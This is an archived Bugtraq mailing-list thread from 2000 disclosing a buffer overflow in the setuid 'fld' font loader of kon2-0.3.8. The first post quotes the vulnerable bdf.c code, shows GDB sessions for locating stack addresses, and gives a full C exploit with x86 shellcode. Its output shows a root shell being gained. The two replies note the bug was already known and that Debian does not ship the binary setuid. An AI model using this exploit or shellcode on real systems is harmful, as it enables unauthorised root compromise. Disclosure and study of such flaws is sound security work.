5330770 2000-08-04 20:46 /299 rader/ Brevbäraren (som är implementerad i) Python Mottagare: Bugtraq (import) <12061> Ärende: kon2 ------------------------------------------------------------ From: Elias Levy <aleph1@SECURITYFOCUS.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <20000804095642.G5625@securityfocus.com> ----- Forwarded message from Black Sphere <bsphere@usa.net> ----- Message-ID: <000801bffc78$b8ab4390$0100a8c0@sphere> From: "Black Sphere" <bsphere@usa.net> To: <aleph1@securityfocus.com> Subject: Bugtraq List Date: Wed, 2 Aug 2000 12:56:39 +0100 X-Mailer: Microsoft Outlook Express 5.00.2919.6700 I´ve send this e-mail to LISTSERV@securityfocus.com, but i haven´t seen it in the mailing list, so i send it to you. -------------------------------------------------------------------------------------------------------------------------------------------- Info : Package : kon2-0.3.8 Compromise : root Vulnerable Sistems : All linux sistems that have this package installed. Author : E-Ligth (Hugo Oliveira Dias) - mail : bsphere@clix.pt Discussion : There is a vulnerable suid program, called FLD that is part of the kon2-0.3.8 package. This program accepts options input from a text file and its possible to input arbitrary code into the stack and spawning a root shell. Exploit: This is the vulnerable part of the program : -------------------------------------- bdf.c ------------------------------------------------- while (fgets (line, 256, fp)) { if (!width && !high && !strncmp ("FONTBOUNDINGBOX", line, strlen ("FONTBOUNDINGBOX"))) { p = line + sizeof ("FONTBOUNDINGBOX"); sscanf (p, "%d %d", &width, &high); } else if (!strncmp ("CHARSET_REGISTRY", line, 16)) { p = line + sizeof ("CHARSET_REGISTRY"); while (*p != '"') p++; w = ++p; while (*p != '"') p++; *p = '\0'; strcpy (reg, w); } -------------------------------------- bdf.c ------------------------------------------------- As we can see , it reads 256 bytes from the file. If our options file looks like this : -------------------------------------- options ------------------------------------------------- CHARSET_REGISTRY CHARSET_REGISTRY "0000000000000000000000 CHARSET_REGISTRY "ISO8859" CHARSET_ENCODING "1" -------------------------------------- options ------------------------------------------------- The program will do p++ while it *p != '"' If we write a exploit program that writes to an environment variable the code and adresses we need between quotes, its possibele to put the value of the environment variable in variable reg with strcpy. When we define a environment variable, the whole environment, including our variable, will be at the end of the stack.So if we don´t put quotes in the options file, variable w will point to our code.If we find quotes somewhere in the memory, before our code appears, we just add : CHARSET_REGISTRY lines, until all the quotes that are before our code in the stack becames : '\0' (When *p = '\"' for second time, it will convert '\"' to '\0'). The size of the buffer must be 541 : Stack looks like this 256 256 4 4 4 4 [ reg ] [ line ] [ fsp ] [ ret ] [ fp ] [...] ............[EGG = \"...our code ...\"]... We cannot destroy the adresses after ret with the '\0' char of strcpy(), so we must use GDB and a version of FLD compiled with the -ggdb option and get two or three values after [ret] that cannot be destroyed and must be replaced. For this we do : [sphere@fire font]# gdb fld GNU gdb 19991116 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... (gdb) set args -type bdf ./cod (gdb) break FontLoadBdf Breakpoint 1 at 0x8049a14: file bdf.c, line 31. (gdb) r Starting program: /usr/src/RPM/SOURCES/kon2-0.3.8/font/fld -type bdf ./options Breakpoint 1, FontLoadBdf (fp=0x804c590) at bdf.c:31 31 fi.type = CodingByRegistry ("ISO8859-1"); (gdb) x/6aw $ebp 0xbffff8fc: 0xbffffa3c 0x8049326 <main+694> 0x804c590 0xbffffbef 0xbffff90c: 0x40013460 0x0 (gdb) (gdb) print reg + 20 $1 = 0xbffff710 "`4\001@÷\003" (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x8049af1 in FontLoadBdf (fp=0x804c590) at bdf.c:49 49 p++; (gdb) We change xp.c program with the rigth adresses. All equal to that except "0x8049326 <main+694>" that will become "0xbffff710" Then we copy /usr/bin/fld to our home directory and use gdb tomake a break at fgets() This will give us the value next to [ret]. [sphere@fire font]# gdb fld GNU gdb 19991116 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"...(no debugging symbols found)... (gdb) break fgets Breakpoint 1 at 0x8048a5c (gdb) set args -type bdf ./cod (gdb) r Starting program: /usr/src/RPM/SOURCES/kon2-0.3.8/font/fld -type bdf ./cod Breakpoint 1, 0x40064ad5 in _IO_fgets (buf=0xbffff7fc "Ð6\001\002\001", n=256, fp=0x804bf90) at iofgets.c:34 34 iofgets.c: No such file or directory. Now we have the rigth "fp" address We change xp.c addresses again. -------------------------------------- xp.c ---------------------------------------------------- /* Exploit code for /usr/bin/fld Compile with : gcc -o xp xp.c Made by : E-Ligth (Hugo Oliveira Dias) 01/08/2000 */ #include <string.h> #include <stdlib.h> #include <stdio.h> #define OFFSET 0 #define BUFFSIZE 541 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/zh"; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } int main(int argc,char *argv[]) { int bsize = BUFFSIZE; int offset = OFFSET; int i; long *addr_ptr, addr; char *ptr,*buf,*env; char arg[30]; if (!(buf = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } ptr = buf; for (i = 0; i < bsize; i++) *(ptr++) = shellcode[i]; buf[519] = 0x3c; /* Saved EBP 0xbffffa3c */ buf[520] = 0xfa; buf[521] = 0xff; buf[522] = 0xbf; buf[523] = 0x10; /* Return Address 0xbffff710 */ buf[524] = 0xf7; buf[525] = 0xff; buf[526] = 0xbf; buf[527] = 0x90; /* fp variable 0x804bf90 */ buf[528] = 0xbf; buf[529] = 0x04; buf[530] = 0x08; buf[531] = 0xef; /* variable thats shouldn´t be destroyed 0xbffffbef */ buf[532] = 0xfb; buf[533] = 0xff; buf[534] = 0xbf; buf[535] = 0x60; /* variable thats shouldn´t be destroyed 0x40013460 */ buf[536] = 0x34; buf[537] = 0x01; buf[538] = 0x40; memcpy(buf,"-type \"",7); buf[540] = '\0'; buf[539] = '\"'; memcpy(arg,"-type bdf ./code",16); arg[16] = '\0'; env = (char *) malloc(bsize + 10); memcpy(env,"EGG=",4); strcat(env,buf); putenv(env); system("/bin/bash"); exit(0); -------------------------------------- xp.c ---------------------------------------------------- Now all we have to do is : [sphere@fire my]$ gcc -o xp xp.c [sphere@fire font]$ ./xp [sphere@fire font]$ fld -type bdf ./options dircolors: no SHELL environment variable, and no shell type option given /etc/profile.d/color_ls.sh:3: parse error: condition expected: = sphere@fire ~/my $ whoami root sphere@fire ~/my $ This code uses zsh with the name of zh to spawn the shell. The exploit code was developed to participate in Wargames of www.hack3r.com. The target computer was the host hercules.hacker.org running Turbo Linux 6.0.4 and my distribution is Linux Mandrake 7.0.Both revealed to be vulnerable to this exploit. I think Debian also as this package but i don´t try this exploit in it. Solving : I didn't work on the patch because i´ve no time, but i advise people to remove suid from that program until a patch is available. I didn't know where to report the bug first, because is the first time i find a suid exploitable program, so i send it to you www.securityfocus.com and so the problem can be solved. Thanks for your attention, E-Ligth (Hugo Oliveira Dias) Email : bsphere@clix.pt -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com> iQA/AwUAOYYsk8IMfhGvrGFNEQLsxACggUulavLEue099ivMmV+kCIZGyI4AnRP9 xQKBluwLd4xFOUMC35Cmd/Jw =85FF -----END PGP SIGNATURE----- ----- End forwarded message ----- -- Elias Levy SecurityFocus.com http://www.securityfocus.com/ Si vis pacem, para bellum (5330770) ------------------------------------------(Ombruten) Kommentar i text 5336289 av Brevbäraren (som är implementerad i) Python Kommentar i text 5336582 av Brevbäraren (som är implementerad i) Python Läsa nästa kommentar. 5336289 2000-08-07 08:50 /34 rader/ Brevbäraren (som är implementerad i) Python Mottagare: Bugtraq (import) <12068> Kommentar till text 5330770 av Brevbäraren (som är implementerad i) Python Ärende: Re: kon2 ------------------------------------------------------------ From: Chris Evans <chris@FERRET.LMH.OX.AC.UK> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <Pine.LNX.4.21.0008042128450.4307-100000@ferret.lmh.ox.ac.uk> On Fri, 4 Aug 2000, Elias Levy wrote: > ----- Forwarded message from Black Sphere <bsphere@usa.net> ----- > > Info : > > Package : kon2-0.3.8 > Compromise : root [...] > > else if (!strncmp ("CHARSET_REGISTRY", line, 16)) [...] Old news. Same vulnerability is noted (along with others) in my Jun 19th post. There has, of course, been a slew of kon2 package updates recently. I wonder if vendors/maintainers simply patched the single bugs in question, or took active measures to hunt down others? I'd love it to be demonstrated otherwise, but I bet these bugs did not spur a proper audit, and more root compromises remain. Cheers Chris (5336289) ------------------------------------------(Ombruten) Läsa nästa kommentar. 5336582 2000-08-07 10:33 /45 rader/ Brevbäraren (som är implementerad i) Python Mottagare: Bugtraq (import) <12082> Kommentar till text 5330770 av Brevbäraren (som är implementerad i) Python Ärende: Re: kon2 ------------------------------------------------------------ From: Martin Schulze <joey@FINLANDIA.INFODROM.NORTH.DE> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <20000807002637.A21659@finlandia.infodrom.north.de> Elias Levy wrote: > Package : kon2-0.3.8 > Compromise : root > Vulnerable Sistems : All linux sistems that have this package installed. > Author : E-Ligth (Hugo Oliveira Dias) - mail : bsphere@clix.pt > > Discussion : > > There is a vulnerable suid program, called FLD that is part of the kon2-0.3.8 > package. This program accepts options input from a text file and its possible > to input arbitrary code into the stack and spawning a root shell. > This code uses zsh with the name of zh to spawn the shell. > The exploit code was developed to participate in Wargames of www.hack3r.com. > The target computer was the host hercules.hacker.org running Turbo Linux 6.0.4 > and my distribution is Linux Mandrake 7.0.Both revealed to be vulnerable to this > exploit. I think Debian also as this package but i don´t try this exploit in it. Yes, Debian distributes kon2 packages: Debian GNU/Linux 2.1 0.3.7-9 Debian GNU/Linux 2.2 0.3.9b-3 The Debian maintainer for kon2 has decided not to make /usr/bin/fld setuid, so the exploit doesn seem to work there. > I didn't know where to report the bug first, because is the first time i find > a suid exploitable program, so i send it to you www.securityfocus.com and so > the problem can be solved. Thanks. Regards, Joey Debian Security Team -- Unix is user friendly ... It's just picky about its friends. (5336582) ------------------------------------------